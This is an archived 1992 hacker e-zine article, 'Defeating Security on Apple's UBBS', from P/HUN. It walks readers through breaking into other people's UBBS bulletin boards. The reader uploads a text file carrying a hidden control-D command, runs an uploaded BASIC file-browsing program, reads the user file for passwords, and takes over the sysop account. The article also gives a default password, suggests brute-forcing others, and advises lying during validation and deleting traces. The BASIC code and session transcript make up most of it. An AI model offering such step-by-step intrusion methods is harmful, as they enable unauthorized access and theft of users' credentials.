home *** CD-ROM | disk | FTP | other *** search
/ Hacker Chronicles 1 / HACKER1.ISO / miscpub1 / phun203.txt < prev    next >
Text File  |  1992-09-26  |  10KB  |  315 lines

  1.  
  2. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  3. =                Volume 1 , P/HUN Issue #2 , Phile #3 of 9                    =
  4. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  5.  
  6.                     Defeating Security on Apple's UBBS
  7.                     ---------------------------------- 
  8.                        Writen by Evil Mind of CTG
  9.                        Computer Terrorists Guild
  10.  
  11.  
  12. Introduction
  13. -------------
  14.  
  15.    Hello fellow hackers are phreakers, I'm here to tell you all about Apple's
  16. UBBS.  This is a nice little program that will make any Apple computer with a
  17. modem have the ability to be a bbs.  It can be on any storage device, from
  18. a 5.25 disk, to a chain of hard drives.  I doubt any hackers or phreakers are
  19. using this program, because everyone (in Apple's world) uses GBBS.  So, let's
  20. get down to business.
  21.  
  22.    For flexability, UBBS has been written in BASIC.  For our convience, hackers
  23. with a knowledge of universial basic (or better yet, knowledge of Apple BASIC)
  24. will have a good time.  The only catch is, the control-c (break basic programs)
  25. is screened out by a ml routine before it hits basic.  But, no need to fear,
  26. discussion on hacking it is later.
  27.  
  28.    When a sysop first uses a UBBS program, the sysop must run the program
  29. SYSGEN.... which is for System Generation, the "Creator Program" for the
  30. board.  Questions are name of board, sysop's name, bullitin's names,
  31. and other things needed before the next program is run: LOGON... which will
  32. then put the computer in answer mode.
  33.  
  34.    Let's say some guy calls a few days later.  The LOGON program will then
  35. display a bbs title, then something like "Enter your name or press <RETURN>
  36. for NEW."  So, this guy does a <RETURN> for new... questions are asked, and
  37. then the sysop validates him.  Normal procedure like any other bbs program.
  38.  
  39. Hacking it
  40. -----------
  41.  
  42.    Once in the system, get access to the <F>eatures section which hopefully
  43. has a up/downloading section.  If they give a lame excuse of not giving
  44. it to you because of an IBM, lie in the validation part, and say you own an
  45. Apple.  First, upload some text file... like a list of bbs numbers.  If the
  46. file needs to be validated by the sysop before further access from the public,
  47. then it will be hard to hack it out. (Explained later.)
  48.  
  49.    Now, at least you have some access... hopefully the u/d ratio is 1:1 or
  50. better.  So, upload two more files!
  51.  
  52. File #1
  53. --------
  54.  
  55.    This is the most important file in the hacking process.  This file should
  56. contain the following or simular to it: (<CR>=<RETURN>) This is a TEXT file.
  57.  
  58. ------------------------------------------------------------------------------
  59.  
  60. THIS IS A POEM<CR>
  61. <CR>
  62. <Control-D>CAT<CR>
  63. RAT<CR>
  64. DOG<CR>
  65. PAT<CR>
  66. <CR>
  67. BY MR. WALTHER<CR>
  68.  
  69. ------------------------------------------------------------------------------
  70.  
  71. File explained:
  72.  
  73. Well, the control D is needed.  If you can't enter it from your word processor,
  74. then enter "DCAT" and go in with a disk editor and change character D into
  75. hex $04, which is a control-d to Apple. Normally, control-d is within programs,
  76. used to run disk commands from basic.  When viewed, it will catalog the
  77. current storage device (hard, 3.5, or 5.25) and will be stuck in a "zombie"
  78. mode.  Also, when downloading this file, view it, don't use Xmodem. But upload
  79. file #2 with it, so you can hack in one call and delete your tracks.
  80.  
  81.  
  82. File #2
  83. --------
  84.  
  85.    Well, this program is supposed to be basic, but since a lot of hackers I
  86. know have IBM's, I'll make it hackable from both Apple and IBM.  Make the
  87. following TEXT, that's right, text file.
  88.  
  89. ------------------------------------------------------------------------------
  90.  
  91. 10 ONERR GOTO 1000
  92. 20 HOME
  93. 30 PRINT "A DISK PREFIXER"
  94. 40 PRINT
  95. 50 PRINT "<P>REFIX   <C>ATALOG   <V>IEW   <D>ELETE   <R>UN"
  96. 60 INPUT A$
  97. 70 IF A$<>"P" OR A$<>"p" THEN 100
  98. 80 PRINT "PREFIX WHAT? (RETURN FOR LIST, OR FOLLOW EXAMPLE: /HARD1/BBS"
  99. 90 INPUT A$: PRINT CHR$(4);"PREFIX ";A$: GOTO 40
  100. 100 IF A$<>"C" OR A$<>"c" THEN 120
  101. 110 PRINT CHR$(4);"CATALOG": GOTO 40
  102. 120 IF A$<>"D" OR A$<>"d" THEN 150
  103. 130 PRINT "DELETE WHAT FILE?"
  104. 140 INPUT A$: PRINT CHR$(4);"DELETE ";A$: GOTO 40
  105. 150 IF A$<>"R" OR A$<>"r" THEN 180
  106. 160 PRINT "RUN WHICH FILE?"
  107. 170 INPUT A$: PRINT CHR$(4);"RUN ";A$: GOTO 40
  108. 180 IF A$<>"V" AND A$<>"v" THEN PRINT "NOT A COMMAND": GOTO 40
  109. 190 PRINT "VIEW WHICH FILE?"
  110. 200 INPUT A$: PRINT CHR$(4);"OPEN ";A$: PRINT CHR$(4);"READ ";A$
  111. 210 ONERR GOTO 230
  112. 220 INPUT B$: PRINT B$: GOTO 220
  113. 230 PRINT CHR$(4);"CLOSE ";A$: ONERR GOTO 1000
  114. 240 GOTO 40
  115. 1000 PRINT "ERROR!": CALL -1370
  116.  
  117. ------------------------------------------------------------------------------
  118.  
  119.    Upload the files.  When asked about file #2, say it's a TXT file.
  120.  
  121.    Now view file #1.  It will catalog (or DIR) the disk,
  122. and then be in a "zombie" state.  This is when the basic thinks the disk is
  123. still being read, and is really stuck, for you to enter things.  To clear that
  124. up, the INPUT command is used both for keyboard input, or in the correct
  125. conditions (that UBBS uses), disk input from text files!
  126.  
  127.    If you can't see it yet, press a control-D and a disk command.  The real
  128. intention is to run file #2, which will do the hacking.  But, File#2 and
  129. File#1 might be in a different directory than the transfer program.  Use
  130. these commands: (With a control-D before them)
  131.  
  132. CAT             to see what is on the disk.
  133.  
  134. Example:
  135.  
  136. ]CAT
  137.  
  138. /HARD1        (PREFIX NAME)
  139.  
  140. PROGRAMS          DIR   10-NOV-88  2
  141. PRODOS            SYS   06-APR-81  32
  142. BASIC.SYSTEM      SYS   07-APR-81  20
  143. BASIC.PROGRAMS    BAS   10-NOV-88  5
  144. ML.PROGRAMS       BIN   10-NOV-88  7
  145. READ.ME           TXT   10-NOV-88  10
  146.  
  147.    In which case, should explore further with a
  148.  
  149. ]PREFIX /HARD1/PROGRAMS
  150. ]CAT
  151.  
  152. /HARD1/PROGRAMS
  153.  
  154. LOGON             BAS   10-APR-84  54
  155. SYSOP             BAS   10-APR-84  34
  156.  
  157.    Once you explore enough to fine your files, do an:
  158.  
  159. ]EXEC file#2
  160.  
  161.    Replace "file#2" with whatever you named the second file.
  162. Note: exploring will take a long time, because you might need to find some
  163. other things to intrest you, like the logon program (which can be in another
  164. directory). When exploring in the zombie state, the computer sometimes zaps out
  165. back into normal running mode.  Re-download and start where you left off.
  166.  
  167. Then it'll go:
  168.  
  169. A DISK PREFIXER
  170.  
  171. <P>REFIX   <C>ATALOG   <D>ELETE   <V>IEW   <R>UN
  172. ?
  173.  
  174.    Then enter the desired one, in this case, "P" and press enter.
  175. Here's how to work them:
  176.  
  177. Examples: from basic
  178.  
  179. ]PREFIX /HARD1/FILES   (to get to the diectory /hard1/files)
  180. ]PREFIX /HARD1/        (to get back to /hard1)
  181. ]PREFIX                (tells you what the current prefix is)
  182. ]CATALOG               (DIR a disk for you)
  183. ]RUN LOGON             (Go back to LOGON program)
  184.  
  185.    View is a different thing, and can't be done from basic.  In this case,
  186. choose "V" for view, (beforehand, find the userinfo file, a text file.)
  187. And when it goes:
  188.  
  189. VIEW WHICH FILE?
  190. ?
  191.  
  192. type in a pathname.... example:
  193.  
  194. VIEW WHICH FILE?
  195. ?/HARD1/BBS/USERINFO.DATA
  196.  
  197. and it'll show the passwords.  Explore!  There are a lot of things to do.  One
  198. last word before you finish, the sysop is 001, find his password, log in as
  199. him, then make all your accounts from there (because he validates and creates
  200. accounts.)
  201.  
  202.    The form for UBBS passwords are:
  203.  
  204. NNNCCCC   where N is a number, and C is a character.
  205. example: 001SYSOP.  Also, 001SYSOP is the default password? (I'm not sure, but
  206. I think it is.)  Try it on a new board and see if the sysop didn't change it
  207. yet.
  208.  
  209. So if your victim board doesn't have the requirements, just use a password
  210. scanner and try out 001AAAA   001AAAB and all, and eventually you can get it
  211. in a matter of weeks.  (No lowercase or control characters are accepted by
  212. UBBS.)
  213.  
  214. All in a nutshell, here's another example:
  215.  
  216. ------------------------------------------------------------------------------
  217.  
  218. Welcome to a UBBS system.
  219.  
  220. Enter name or press return for new users
  221. XXXXXXX
  222. checking password.
  223. Hello Mr. Bill, today is 00/00/00
  224.  
  225. news for today:
  226.  
  227.                This is a new board and hope ya enjoy it,
  228.                 Your sysop, Tom Hacket.
  229.  
  230. No Email waiting
  231. Email>Quit
  232.  
  233. Main level:
  234. B/A/G/J/N/F/Q/Help
  235. >Features
  236.  
  237. loading xfer, please wait...
  238.  
  239. Xfer command>
  240. Upload
  241.  
  242. choose protocol:
  243.  
  244. X>modem
  245. T>ext
  246.  
  247. Xmodem
  248.  
  249.  
  250. (upload files)
  251.  
  252. 70 blocks recieved....
  253.  
  254. Information:
  255.  
  256. What is file#1's type:
  257. TXT
  258. What is file#2's type:
  259. TXT
  260.  
  261. Thank you.
  262.  
  263.  
  264. Xfer command>
  265. Download
  266.  
  267. Download what file?
  268. TEST.UPLOAD  (file#1)
  269.  
  270. THIS IS A POEM
  271.  
  272. /HARD1/ONLINE
  273.  
  274. CALLER.LOG   06   TXT
  275. USER.INFO    65   TXT
  276. LOGON        45   BAS
  277. SYSGEN       65   BAS
  278. TEST.UPLOAD  02   TXT
  279. PREFIXER     03   TXT
  280. LEECHES      02   TXT
  281.  
  282.  
  283. (Zombie state) (control-D)EXEC PREFIXER(return)
  284.  
  285. A DISK PREFIXER
  286.  
  287. <C>ATALOG   <V>IEW   <R>UN   <D>ELETE   <P>REFIX
  288. ?B
  289.  
  290. NOT A COMMAND!
  291.  
  292. <C>ATALOG   <V>IEW   <R>UN   <D>ELETE   <P>REFIX
  293. ?V
  294. VIEW WHICH FILE?
  295. ?USER.INFO
  296.  
  297. (list of passwords)
  298.  
  299. <C>ATALOG   <V>IEW   <R>UN   <D>ELETE   <P>REFIX
  300. ?R
  301. RUN WHICH FILE?
  302. ?LOGON
  303.  
  304. (Automatically hangs up, you re-call, then log in as sysop, and make another
  305. account with good access.)
  306.  
  307.  
  308.  
  309.  
  310. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  311.  
  312. DOWNLOADED FROM P-80 SYSTEMS 304-744-2253
  313.  
  314. Downloaded From P-80 International Information Systems 304-744-2253 12yrs+
  315.